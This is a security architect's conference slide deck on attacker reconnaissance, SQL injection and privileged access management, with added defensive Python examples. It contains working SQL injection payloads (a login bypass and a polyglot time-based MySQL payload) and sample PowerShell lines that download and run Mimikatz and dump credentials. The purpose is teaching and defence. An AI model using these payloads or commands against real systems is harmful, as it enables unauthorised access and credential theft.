Jean-Paul Garcia-Moran
Security Architect
March 2017
Protect and survive—safeguarding your information assets
#MFSummit2017
What is the feeling out there on security?
Source: PwC Global Economic Crime Survey 2016
• 44% of UK respondents experienced cybercrime, up from 24% in 2014
• 71% of respondents felt the risk of cybercrime had increased over the last 2 years
• 51% of respondents felt that they would probably get hacked in the next two years (sinking expectations from people)
Cyber Kill Chain
1. Reconnaissance
2. Weaponisation
3. Delivery
4. Exploitation
5. Installation
6. Command & Control (C2)
7. Actions on Objectives
Information Gathering on:
• Services
• Connectivity
• Data Repositories
• File Sharing
• Internet Facing Devices
Active Reconnaissance
• Tools for network scanning
• Query public DNS databases for info on IPs
• Enumerate services and vulnerabilities
Passive Reconnaissance
• Specialized search engines provide an advantage of relative anonymity when researching targets
• Public repositories such as GitHub can be searched for users mistakenly publishing passwords and application code. (If there is one guarantee, it is that users make mistakes!)
• Many public databases to share Google Dorks
• Look for login UIs
• Shared documents in public clouds
• Web server information
• Application errors (SQLi attack vector)
How to perform SQLi
• Most of the time, it's an attack of opportunity
• Automation is possible with advanced payload techniques
• Common targets are PHP and MySQL applications
Login form: username ' OR 1=1;/* and password */ --
Resulting query: SELECT * FROM `users` WHERE `username` = '' OR 1=1; /* AND `password` = '*/ --'
The username closes the string literal and opens a block comment, the password closes that comment, and the trailing -- discards the final quote. Unauthorized access is granted to the application.
Injection into a double-quoted string literal: SELECT * FROM some_table WHERE double_quotes = "[Injection point]"
Advanced SQLi Payloads
Polyglot time-based payload that works whether the injection point is double-quoted, single-quoted or unquoted (MySQL: BENCHMARK on versions below 5, SLEEP otherwise):
"IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
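The login bypass above, as an added worked example that is not part of the original deck: the vulnerable string-spliced query beside its parameterised replacement, run against the slide's exact payload. The accounts are constructed, and SQLite is used in place of the MySQL back end the slide mentions (an assumption of this example; the query shape and the comment/quote handling are the same).

```python
import sqlite3

# Constructed sample accounts (not real credentials). SQLite stands in for the
# MySQL back end the slide refers to; the vulnerable query shape is identical.
SAMPLE_USERS = [
    ("alice", "s3cret-alice"),
    ("bob", "s3cret-bob"),
]


def make_db():
    """In-memory database seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """The pattern on the slide: user input spliced straight into the SQL text."""
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def vulnerable_login(conn, username, password):
    """Returns the usernames the database matched; any row means 'logged in'."""
    rows = conn.execute(build_vulnerable_query(username, password))
    return sorted(row[0] for row in rows)


def safe_login(conn, username, password):
    """Parameterised query: the driver sends the values separately from the SQL
    text, so quote and comment characters in the input never become syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


def demo():
    """Runs the slide's payload against both implementations."""
    conn = make_db()
    user_payload = "' OR 1=1;/*"   # closes the string, opens a block comment
    pass_payload = "*/ --"         # closes the comment, comments out the last quote
    return {
        "query": build_vulnerable_query(user_payload, pass_payload),
        "vulnerable": vulnerable_login(conn, user_payload, pass_payload),
        "safe": safe_login(conn, user_payload, pass_payload),
        "legitimate": safe_login(conn, "alice", "s3cret-alice"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable path returns every user because the WHERE clause collapses to `username = '' OR 1=1`; the parameterised path returns nothing for the payload and still works for a real login, which is the check to add when auditing PHP/MySQL code that builds queries by concatenation.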
GitRob
• Look for passwords hardcoded in scripts
• Look for private keys mistakenly published
• Look for juicy info inside log files and scripts
Device search engines
• Search for devices with weak or no security
• Search for devices within a particular IP block to investigate a target
• Search for a particular type of server
Stealthy Exploitation
"These meatbags see me as a trusted process; little do they suspect that I am actually an advanced hacker tool written in PowerShell. I am capable of stealthily staging a breach!"
"These puny humans think their secrets are safe! But I, with my advanced memory manipulation techniques, will recover all your passwords and Kerberos tickets! They will never know what hit them! HA HA HA!!"
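The PowerShell tooling the cartoon describes leaves a trace if script-block logging is on: Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log records the script text, including the decoded body of an -EncodedCommand launch. The following is an added example, not from the deck or any vendor product, of triage logic run over constructed script-block texts; the indicator list is a set of common heuristics chosen for this example and the weights and threshold are assumptions.

```python
import base64
import re

# Constructed script-block texts in the shape of Event ID 4104 entries
# (Microsoft-Windows-PowerShell/Operational); none of these are real captures.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\svc_backup\\Documents | Measure-Object",
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/Invoke-Mimikatz.ps1'); "
    "Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'",
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + base64.b64encode("Invoke-Mimikatz -DumpCreds".encode("utf-16-le")).decode("ascii"),
    "$addr = [Kernel32]::VirtualAlloc(0, $sc.Length, 0x3000, 0x40); "
    "[Runtime.InteropServices.Marshal]::Copy($sc, 0, $addr, $sc.Length)",
]

# (name, pattern, weight): common heuristics, weighted by how specific they are.
INDICATORS = [
    ("credential dumping",
     re.compile(r"(?i)invoke-mimikatz|sekurlsa::|lsadump::|kerberos::"), 10),
    ("download cradle",
     re.compile(r"(?i)downloadstring|downloadfile|iex\s*\("), 5),
    ("in-memory loading",
     re.compile(r"(?i)virtualalloc|writeprocessmemory|marshal\]::copy|reflection\.assembly\]::load"), 5),
    ("encoded or hidden launch",
     re.compile(r"(?i)-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden|frombase64string"), 3),
]

ENCODED_ARG = re.compile(r"(?i)-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_commands(text):
    """-EncodedCommand carries base64 of UTF-16LE script; decode it so the
    indicators are matched against what actually runs, not only the launcher."""
    decoded = []
    for blob in ENCODED_ARG.findall(text):
        try:
            decoded.append(base64.b64decode(blob).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def score_block(text):
    """Sum of weights of the indicator classes present in the text or its decoded payload."""
    decoded = decode_encoded_commands(text)
    haystack = "\n".join([text] + decoded)
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(haystack)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return {"score": score, "indicators": hits, "decoded": decoded}


def triage(blocks, threshold=8):
    """Indices and scores of the blocks that deserve an analyst's attention."""
    results = [(i, score_block(text)) for i, text in enumerate(blocks)]
    return [(i, r) for i, r in results if r["score"] >= threshold]


if __name__ == "__main__":
    for i, result in triage(SAMPLE_SCRIPT_BLOCKS):
        print(i, result["score"], result["indicators"])
```

The fourth sample (raw memory allocation and copy) scores below the threshold on its own: a single generic indicator is noisy, which is why the credential-dumping signatures carry most of the weight and why the encoded payload must be decoded before matching.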
• Passwords are sometimes hardcoded in Group Policies for configuration or update purposes
• They can be found in scripts used for maintenance of systems
• Many users hold privileged accounts and it's easier to attack them
• Phishing campaigns are very effective at compromising the users
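Both the GitRob slide (passwords and private keys published in repositories) and the point above about credentials in Group Policy and maintenance scripts come down to the same check. The following is an added example, not GitRob's code and not from the deck: a minimal scanner over constructed file contents that stand in for a cloned repository and a SYSVOL share. The patterns and the variable-reference filter are choices made for this example; Group Policy Preferences store the password in a cpassword attribute whose decryption key Microsoft published, so the scanner only needs to flag the attribute, not decrypt it.

```python
import re

# Constructed sample files standing in for a cloned repository and a SYSVOL
# share; every path, key and value below is made up for this example.
SAMPLE_FILES = {
    "deploy/backup.sh": (
        "#!/bin/sh\n"
        "# nightly maintenance job\n"
        "DB_PASSWORD='Summer2017!'\n"
        "export API_SECRET=$VAULT_TOKEN\n"
        "mysqldump -u backup -p\"$DB_PASSWORD\" prod > /tmp/prod.sql\n"
    ),
    "config/id_rsa": (
        "-----BEGIN RSA PRIVATE KEY-----\n"
        "MIIEowIBAAKCAQEAconstructedsamplekeymaterial\n"
        "-----END RSA PRIVATE KEY-----\n"
    ),
    "SYSVOL/example.local/Policies/Machine/Preferences/Groups/Groups.xml": (
        '<Groups><User name="LocalAdmin"><Properties userName="LocalAdmin" '
        'cpassword="dGhpcy1pcy1hLWNvbnN0cnVjdGVkLXNhbXBsZQ"/></User></Groups>\n'
    ),
    "README.md": "# Ops scripts\nNothing sensitive here.\n",
}

# Checked in order; the first pattern that matches a line decides its finding kind.
PATTERNS = [
    ("private_key", re.compile(r"-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----")),
    ("gpp_cpassword", re.compile(r'cpassword="([^"]+)"')),
    ("hardcoded_password",
     re.compile(r"(?i)(?:pass(?:word|wd)?|pwd|secret)\s*[:=]\s*['\"]?([^'\"\s]+)")),
]


def is_reference(value):
    """A shell or batch variable reference points at a secret; it is not the secret."""
    return value.startswith("$") or value.startswith("%")


def scan(files):
    """One finding per matching line; the secret itself is never echoed in full."""
    findings = []
    for path, content in files.items():
        for line_no, line in enumerate(content.splitlines(), start=1):
            for kind, pattern in PATTERNS:
                match = pattern.search(line)
                if not match:
                    continue
                value = match.group(1) if match.groups() else ""
                if value and is_reference(value):
                    break
                findings.append({
                    "path": path,
                    "line": line_no,
                    "kind": kind,
                    "evidence": value[:3] + "***" if value else "key block",
                })
                break
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_FILES):
        print(finding)
```

Run it against a fresh clone or a SYSVOL copy before an attacker does; the `$VAULT_TOKEN` line shows the false positive a naive `password=` grep produces when a script reads its secret from a vault at runtime.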
Privileged Access Management
The policy engine does the following:
1) Evaluates rules
2) If the user is allowed, obtains privileged credentials
3) Starts a privileged session with the protected system
4) Connects the user to the privileged session
Components: Policy Engine, Credential Vault, Bastion Server, Firewall; privileged accounts on the protected system (e.g. admin, root)
• Access Policy Management
• Super User Privilege Management (SUPM)
• Shared Account Password Management (SAPM)
• Real-time Activity Monitoring
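The four steps above, as an added model that is not the deck's or any vendor's code: a deny-by-default policy engine that checks group membership and a time window, fetches the credential from a vault itself, and hands the user only a session handle. Rule fields, the hour-based window, the vault layout and all names and secrets are constructed for this example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
import secrets


@dataclass(frozen=True)
class Rule:
    """Which group may use which privileged account on which target, and when
    (hours are local to the policy engine; start inclusive, end exclusive)."""
    group: str
    target: str
    account: str
    start_hour: int
    end_hour: int


@dataclass(frozen=True)
class Session:
    """What the user receives: a handle to a brokered session, never the secret."""
    session_id: str
    user: str
    target: str
    account: str
    expires: datetime


class PolicyEngine:
    def __init__(self, rules, vault, group_members):
        self.rules = rules
        self.vault = vault                  # {target: {account: secret}}, engine-only
        self.group_members = group_members  # {group: {user, ...}}
        self.sessions = {}                  # session_id -> bastion-side record
        self.audit = []                     # (time, user, target, account, decision)

    def evaluate(self, user, target, account, now):
        """Step 1: deny by default; allow only if some rule matches the request."""
        for rule in self.rules:
            if (rule.target, rule.account) != (target, account):
                continue
            if user not in self.group_members.get(rule.group, set()):
                continue
            if rule.start_hour <= now.hour < rule.end_hour:
                return rule
        return None

    def request_session(self, user, target, account, now, ttl=timedelta(hours=1)):
        rule = self.evaluate(user, target, account, now)
        if rule is None:
            self.audit.append((now, user, target, account, "DENY"))
            return None
        # Step 2: the engine, not the user, fetches the credential from the vault.
        credential = self.vault[target][account]
        # Step 3: simulated bastion hop; a real jump host logs in to the target with
        # the credential here and records the session for activity monitoring.
        session_id = secrets.token_hex(8)
        self.sessions[session_id] = {"target": target, "account": account,
                                     "credential_used": credential is not None}
        self.audit.append((now, user, target, account, "ALLOW"))
        # Step 4: only the session handle goes back to the user.
        return Session(session_id, user, target, account, now + ttl)


def demo():
    """Constructed rules, vault contents and users; every value is made up."""
    engine = PolicyEngine(
        rules=[Rule("dba", "db01.example.local", "root", 8, 18)],
        vault={"db01.example.local": {"root": "constructed-root-secret"}},
        group_members={"dba": {"alice"}},
    )
    office_hours = datetime(2017, 3, 1, 10, 0)
    night = datetime(2017, 3, 1, 2, 0)
    return {
        "alice_day": engine.request_session("alice", "db01.example.local", "root", office_hours),
        "alice_night": engine.request_session("alice", "db01.example.local", "root", night),
        "bob_day": engine.request_session("bob", "db01.example.local", "root", office_hours),
        "audit": engine.audit,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the split is that the root password never leaves the engine: the user authenticates as themselves, the audit trail records who asked for which shared account and when, and a request outside the window or from a non-member is refused without touching the vault.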
Privileged Access Management
Components: Enterprise Credential Vault, Identity Vault (driver sync), Managed Applications
Privileged users:
• Sysadmins
• External consultants
• DBAs
• Developers
• Helpdesk
Leverage good governance
Managed systems: Databases, Operating Systems, Network Devices, SharePoint, RACF, SAP, LDAP
Identity Governance and Administration:
• Privileged Access Request
• Privileged Identity Governance
• Time Based Provisioning
• Authorization Workflows
Could it have been prevented?
• Identity Governance
• Multi-Factor Authentication
• Change Management
• Risk Based Authentication
• SIEM Monitoring and Anomaly Detection
• Privileged Account Management
Recommendations
• Block Shodan scanners at the firewall (IPFire guide): http://wiki.ipfire.org/en/configuration/firewall/blockshodan
• Move to the lowest privilege model
• Manage those passwords
• Enable the users to improve their own security
• Identify threat sources and actors and follow up on them (obsessively!!)
• Determine likely targets for these actors
• Manage the vulnerabilities
• Simulate attacks to test how effective the organization is at detecting and remediating
• Learn, improve and repeat.